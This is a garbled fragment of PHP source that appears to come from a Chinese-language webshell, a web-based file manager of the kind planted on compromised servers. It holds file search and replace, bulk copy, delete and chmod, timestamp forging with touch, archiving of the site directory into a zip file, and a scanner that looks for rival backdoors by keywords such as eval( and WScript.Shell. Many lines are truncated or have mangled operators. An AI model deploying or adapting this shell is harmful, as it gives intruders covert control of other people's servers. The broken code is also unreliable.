$newcode = str_replace($code,$filetype,$filecode);
do_write($files,"wb",$newcode) ? html_n("成功--& $files&br&") : html_n("失败--& $files&br&");
case "scanfile":
$file = explode('/',$files);
if(stristr($file[count($file)-1],$code)){
html_a("?eanver=editr&p=$files",$files);
echo '&br&';
case "scancode":
$filecode = @file_get_contents($files);
if(stristr($filecode,$code)){
html_a("?eanver=editr&p=$files",$files);
echo '&br&';
case "scanphp":
$fileinfo = pathinfo($files);
if($fileinfo['extension'] == $code){
$filecode = @file_get_contents($files);
if(muma($filecode,$code)){
html_a("?eanver=editr&p=".urlencode($files),"编辑");
html_a("?eanver=del&p=".urlencode($files),"删除");
echo $files.'&br&';
class PHPzip{
var $file_count = 0 ;
var $datastr_len
var $dirstr_len = 0;
var $filedata = '';
var $dirstr='';
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] & 1980) {
$timearray['year']
$timearray['mon']
$timearray['mday']
$timearray['hours']
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
return (($timearray['year'] - 1980) && 25) | ($timearray['mon'] && 21) | ($timearray['mday'] && 16) |
($timearray['hours'] && 11) | ($timearray['minutes'] && 5) | ($timearray['seconds'] && 1);
function startfile($path = 'QQqun555227.zip'){
$this-&gzfilename=$
$mypathdir=array();
$mypathdir[] = $path = dirname($path);
}while($path != '.');
@end($mypathdir);
$path = @current($mypathdir);
@mkdir($path);
}while(@prev($mypathdir));
if($this-&fp=@fopen($this-&gzfilename,"w")){
function addfile($data, $name){
= str_replace('\\', '/', $name);
if(strrchr($name,'/')=='/') return $this-&adddir($name);
= dechex($this-&unix2DosTime());
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$unc_len = strlen($data);
= crc32($data);
= gzcompress($data);
= strlen($zdata);
= substr(substr($zdata, 0, strlen($zdata) - 4), 2);
= "\x50\x4b\x03\x04";
$datastr .= "\x14\x00";
$datastr .= "\x00\x00";
$datastr .= "\x08\x00";
$datastr .= $
$datastr .= pack('V', $crc);
$datastr .= pack('V', $c_len);
$datastr .= pack('V', $unc_len);
$datastr .= pack('v', strlen($name));
$datastr .= pack('v', 0);
$datastr .= $
$datastr .= $
$datastr .= pack('V', $crc);
$datastr .= pack('V', $c_len);
$datastr .= pack('V', $unc_len);
fwrite($this-&fp,$datastr);
$my_datastr_len = strlen($datastr);
unset($datastr);
= "\x50\x4b\x01\x02";
$dirstr .= "\x00\x00";
$dirstr .= "\x14\x00";
$dirstr .= "\x00\x00";
$dirstr .= "\x08\x00";
$dirstr .= $
$dirstr .= pack('V', $crc);
$dirstr .= pack('V', $c_len);
$dirstr .= pack('V', $unc_len);
// uncompressed filesize
$dirstr .= pack('v', strlen($name) );
// length of filename
$dirstr .= pack('v', 0 );
// extra field length
$dirstr .= pack('v', 0 );
// file comment length
$dirstr .= pack('v', 0 );
// disk number start
$dirstr .= pack('v', 0 );
// internal file attributes
$dirstr .= pack('V', 32 );
// external file attributes - 'archive' bit set
$dirstr .= pack('V',$this-&datastr_len ); // relative offset of local header
$dirstr .= $
$this-&dirstr .= $ //目录信息
$this -& file_count ++;
$this -& dirstr_len += strlen($dirstr);
$this -& datastr_len += $my_datastr_
function adddir($name){
$name = str_replace("\\", "/", $name);
$datastr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$datastr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
$datastr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0);
fwrite($this-&fp,$datastr); //写入新的文件内容
$my_datastr_len = strlen($datastr);
unset($datastr);
$dirstr = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$dirstr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
$dirstr .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 );
$dirstr .= pack("V", 16 ).pack("V",$this-&datastr_len).$
$this-&dirstr .= $ //目录信息
$this -& file_count ++;
$this -& dirstr_len += strlen($dirstr);
$this -& datastr_len += $my_datastr_
function createfile(){
//压缩包结束信息,包括文件总数,目录信息读取指针位置等信息
$endstr = "\x50\x4b\x05\x06\x00\x00\x00\x00" .
pack('v', $this -& file_count) .
pack('v', $this -& file_count) .
pack('V', $this -& dirstr_len) .
pack('V', $this -& datastr_len) .
"\x00\x00";
fwrite($this-&fp,$this-&dirstr.$endstr);
fclose($this-&fp);
function File_Act($array,$actall,$inver,$REAL_DIR)
if(($count = count($array)) == 0) return '请选择文件';
if($actall == 'e')
function listfiles($dir=".",$faisunZIP,$mydir){
$sub_file_num = 0;
if(is_file($mydir."$dir")){
if(realpath($faisunZIP -&gzfilename)!=realpath($mydir."$dir")){
$faisunZIP -& addfile(file_get_contents($mydir.$dir),"$dir");
$handle=opendir($mydir."$dir");
while ($file = readdir($handle)) {
if($file=="."||$file=="..")
if(is_dir($mydir."$dir/$file")){
$sub_file_num += listfiles("$dir/$file",$faisunZIP,$mydir);
if(realpath($faisunZIP -&gzfilename)!=realpath($mydir."$dir/$file")){
$faisunZIP -& addfile(file_get_contents($mydir.$dir."/".$file),"$dir/$file");
$sub_file_num ++;
closedir($handle);
if(!$sub_file_num) $faisunZIP -& addfile("","$dir/");
return $sub_file_
function num_bitunit($num){
$bitunit=array(' B',' KB',' MB',' GB');
for($key=0;$key&count($bitunit);$key++){
if($num&=pow(2,10*$key)-1){ //1023B 会显示为 1KB
$num_bitunit_str=(ceil($num/pow(2,10*$key)*100)/100)." $bitunit[$key]";
return $num_bitunit_
$mydir=$REAL_DIR.'/';
if(is_array($array)){
$faisunZIP = new PHP
if($faisunZIP -& startfile("$inver")){
$filenum = 0;
foreach($array as $file){
$filenum += listfiles($file,$faisunZIP,$mydir);
$faisunZIP -& createfile();
return "压缩完成,共添加 $filenum 个文件.&br&&a href='$inver'&点击下载 $inver (".num_bitunit(filesize("$inver")).")&/a&";
return "$inver 不能写入,请检查路径或权限是否正确.&br&";
return "没有选择的文件或目录.&br&";
while($i & $count)
$array[$i] = urldecode($array[$i]);
switch($actall)
case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '路径错误'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = '复制到'.$inver.'目录';
case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = '删除';
case "c" : if(!eregi("^[0-7]{4}$",$inver)) return '属性值错误'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '属性修改为'.$
case "d" : @touch($array[$i],strtotime($inver)); $msg = '修改时间为'.$
return '所选文件'.$msg.'完毕';
function start_unzip($tmp_name,$new_name,$todir='zipfile'){
$z = new Z
$have_zip_file=0;
$upfile = array("tmp_name"=&$tmp_name,"name"=&$new_name);
if(is_file($upfile[tmp_name])){
$have_zip_file = 1;
echo "&br&正在解压: $upfile[name]&br&&br&";
if(preg_match('/\.zip$/mis',$upfile[name])){
$result=$z-&Extract($upfile[tmp_name],$todir);
if($result==-1){
echo "&br&文件 $upfile[name] 错误.&br&";
echo "&br&完成,共建立 $z-&total_folders 个目录,$z-&total_files 个文件.&br&&br&&br&";
echo "&br&$upfile[name] 不是 zip 文件.&br&&br&";
if(realpath($upfile[name])!=realpath($upfile[tmp_name])){
@unlink($upfile[name]);
rename($upfile[tmp_name],$upfile[name]);
function muma($filecode,$filetype){
$dim = array(
"php" =& array("eval(","exec("),
"asp" =& array("WScript.Shell","execute(","createtextfile("),
"aspx" =& array("Response.Write(eval(","RunCMD(","CreateText()"),
"jsp" =& array("runtime.exec(")
foreach($dim[$filetype] as $code){
if(stristr($filecode,$code))
function debug($file,$ftype){
$type=explode('|',$ftype);
foreach($type as $i){
if(stristr($file,$i))
/*---string---*/
function str_path($path){
return str_replace('//','/',$path);
function msg($msg){
die("&script&window.alert('".$msg."');history.go(-1);&/script&");
function uppath($nowpath){
$nowpath = str_replace('\\','/',dirname($nowpath));
return urlencode($nowpath);
function xxstr($key){
$temp = str_replace("\\\\","\\",$key);
$temp = str_replace("\\","\\\\",$temp);
/*---html---*/
function html_ta($url,$name){
html_n("&a href=\"$url\" target=\"_blank\"&$name&/a&");
function html_a($url,$name,$where=''){
html_n("&a href=\"$url\" $where&$name&/a& ");
function html_img($url){
html_n("&img src=\"?img=$url\" border=0&");
function back(){
html_n("&input type='button' value='返回' onclick='history.back();'&");
function html_radio($namei,$namet,$v1,$v2){
html_n('&input type="radio" name="return" value="'.$v1.'" checked&'.$namei);
html_n('&input type="radio" name="return" value="'.$v2.'"&'.$namet.'&br&&br&');
function html_input($type,$name,$value = '',$text = '',$size = '',$mode = false){
if($mode){
html_n("&input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\" checked&$text");
html_n("$text &input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\"&");
function html_text($name,$cols,$rows,$value = ''){
html_n("&br&&br&&textarea name=\"$name\" COLS=\"$cols\" ROWS=\"$rows\" &$value&/textarea&");
function html_select($array,$mode = '',$change = '',$name = 'class'){
html_n("&select name=$name $change&");
foreach($array as $name =& $value){
if($name == $mode){
html_n("&option value=\"$name\" selected&$value&/option&");
html_n("&option value=\"$name\"&$value&/option&");
html_n("&/select&");
function html_font($color,$size,$name){
html_n("&font color=\"$color\" size=\"$size\"&$name&/font&");
function GetHtml($url)
$useragent = 'Mozilla/4.0 ( MSIE 6.0; Windows NT 5.2)';
if(function_exists('fsockopen
